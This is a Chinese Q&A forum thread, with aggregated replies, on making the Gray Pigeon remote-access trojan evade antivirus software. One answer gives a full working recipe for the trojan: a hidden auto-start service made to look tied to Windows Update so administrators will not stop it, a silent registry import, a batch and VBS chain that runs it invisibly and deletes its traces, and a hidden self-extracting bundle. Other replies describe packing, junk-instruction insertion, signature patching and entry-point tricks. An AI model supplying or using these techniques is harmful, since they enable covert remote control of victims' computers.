怎样使灰鸽子生成的木马做到免杀通过杀毒软件?有没有包教会我师傅级的，为了大学论文取材，愿付100元

如何让灰鸽子木马永久免杀？~

这个不可能的，因为你再怎么加壳，再怎么加花，只要杀毒软件公司一截获，然后他们一分析，特征码一加如病毒库，然后用户的病毒库一更新，又可以查杀了。

这个方法在官方出专杀不久，我自己是根据Radmin配置得到的灵感，没什么技术含量，一直不敢说出来怕大家笑话，老鸟就不用看了 废话少说现在讲下正题： 我们的目标是： 过官方专杀，过咔吧主动防御 的不死神鸽 准备工具： 鸽子服务端 IcoSprite图标更改器； SC.exe服务添加删除更改工具； winrar 程序特点： 自解压形式，双击即可 制作过程： 1. 首先自己配置一下鸽子服务端，配置时[启动项设置]这里面的都不要填，不要写入注册表，也不要用服务启动。其他的随你个人爱好。 2.用SC创建一个服务 运行CMD.EXE 在system32的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi" ‘这句是用SC建立一个服务，服务名为huigezi，路径Binpath为"%systemroot%\system32\gezi.exe"，类型type为 own 与interact交互，启动类型start为自动，显示名DisplayName为"gezi"。 sc.exe descript_ion huigezi "不死鸽子" ‘这句是将huigezi服务的描述改为“不死鸽子” sc config wuauserv depend= huigezi ‘配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。 这里的目的是迷惑管理员，使其不敢轻易停止我们生成的服务，自己也可以多加点。 3.将这些从注册表导出，我个人经验是：瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg 4.创建一个BAT文件,并命名为update.bat @regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\Update.vbs @del /q /f /s %systemroot%\system32\Update.bat 5.创建一个vbs并命名为update.vbs 目的是为了作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。 里面写上如下代码： On Error Resume Next set wshshell=createobject ("wscript_.shell") a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE) 6.用我门配置出来的服务端，并命名为run.exe，用run.exe做一个自解压文件，并命名为gezi.exe.。 记得将解压模式为全部隐藏.解压后运行run.exe，当然你的服务端要自己做免杀，这里我就不多说了。八仙过海.... 7.将gezi.exe 1.reg Update.vbs Update.bat 再用winrar制作一个自解压文件，解压到%systemroot%\system32\ 解压后运行Update.vbs 当然解压模式依旧全部隐藏，替换同名文件 现在用rar捆绑出来的文件很多杀软都不杀，你也可以用系统自带的捆绑机，或其他的捆绑机 这个方法可以用到其他的木马中 捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开" 补充： 楼上的不靠谱，人家看都不会看，不管用怎样的手段

很高兴为您解答：
你所说的是不可能实现的行为
当然你使用360是可以的
但是遇到腾讯电脑管家就不行了
没有任何病毒或是木马能逃的过腾讯电脑管家的法眼
建议使用腾讯电脑管家
1，使用电脑管家定期清理自己的垃圾，以保持自己的计算机常用常新；
2，使用电脑管家进行有效的拦截、清杀病毒。
3, 定期进行全盘扫描，让病毒无所遁形，如有难以清除的病毒请尝试在“安全模式”进行。
4，保持良好的上网习惯，不要随意点开陌生人或者来历不明的网址或者链接，对于陌生人发送的任何文件不要随意打开。
阿狸祝楼主祝您工作、生活愉快！！

灰鸽子是用来远程的，杀软根据特征码杀毒，免杀可以通过加花加壳，也要看的免杀学的好不好，如果免杀没做好，杀软病毒库一更新，就能查出病毒。

加壳 加花

反正我是不信你是为了论文取材。写这种论文的肯定会，不会的绝对不是拿来干好事的。

---

道县18839554343： 灰鸽子木马怎么做免杀? - ？
袁连炉甘： C32 OD LordPE 偏移转换工具OC还有 加壳工具 加壳工具用北斗4.1就可以了 我就用 这个 还要MYCLLMYCLL 是 定位用的最好先学会 汇编 学汇编看看8088 就可以了

道县18839554343： 灰鸽子木马怎样做免杀 - ？
袁连炉甘： 所有远控木马免杀都差不多,你要生成以后免杀也行,一生成就免杀也行,最好的后面那种.要一生成就免杀,只要免杀鸽子目录里Cache目录下的CServer.dat文件就行,至于具体免杀方法不是一句两句说的明白的.准备好几个工具:MYCCL,OD,还有你要过的杀毒软件,用MYCCL和杀软定位特征码,OD修改特征码,能过杀软并能正常使用就可以了

道县18839554343： 灰鸽子手工免杀怎么做啊? - ？
袁连炉甘： 首先是生成灰鸽子木马,然后用加壳工具对生成的木马加壳,加壳工具你可以自己搜下,网上很多,然后在自己本地用杀毒软件查杀,杀不出来就表明免杀了,其他加壳就是隐藏病毒特征码.

道县18839554343： 请问我有黑防灰鸽子的密码和木马.怎么把它免杀. - ？
袁连炉甘： 简单说 就是特征码修改,捆绑工具,都可以做免杀 用 myccl.exe 特征码定位在修改特征码 就能达到免杀想学找我 1040364854

道县18839554343： 我用灰鸽子配置的木马一放进对方的电脑就被杀了,我是内网用户.请问如何免杀?？
袁连炉甘： 首先要将病毒 加壳 网上有这类软件 下载 为了方便 就上网找一款免杀 的病毒 在虚拟机中测试 确定免杀后破解该病毒 找到免杀的程序 载入 自己的 FINISH

道县18839554343： 生成的木马怎样做免杀?？
袁连炉甘： 木马好生成,免杀难做啊.下载的木马如果,鸽子,上兴,byshel,pcshell,有很多都没有加壳,因为加了也没有用,没有加壳更方便用户手动加壳,如果加壳,需要peid 或FI查壳,然后用OD,手动脱壳,如果脱完的壳不能运行还要进行修复....

道县18839554343： 灰鸽子怎么做免杀?？
袁连炉甘： 可以用工具免杀,也可以手工免杀,工具一般是加花指令,但是现在的杀软都能脱壳和主动防御,很难过,而手工免杀,就是将特征码部分给模糊处理掉,加上一些跳转指令之类的,但是现在灰鸽子已经过时了,建议使用pcshare或者木偶之类的.

道县18839554343： 给灰鸽子做免杀用什么工具? - ？
袁连炉甘： 当然是生成的服务端啊, 1>.入口点加1免杀法. 1.用到工具:PEditor2.特点:非常简单实用,但有时还会被卡巴查杀.3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可 2>.变化入口地址免杀法 1.用到工具:OllyDbg,PEditor2.特点:...

道县18839554343： 灰鸽子怎么样才能免杀?？
袁连炉甘： 修改木马的特征码,或者多加几个复杂的壳 一般都能过杀软了

道县18839554343： 求教高手:灰鸽子怎么做出来是免杀的?？
袁连炉甘： 还是别用灰鸽子了 那东西被杀毒软件盯的紧 光特征码就要修改好几处... 尽量用一些比较不常见的远控,或者用gh0st这样的开源远控 自己修改代码 如果非要用灰鸽子的话 就试试 加壳、加花、修改特征码、改入口点、改壳等综合起来用...虽然很麻烦.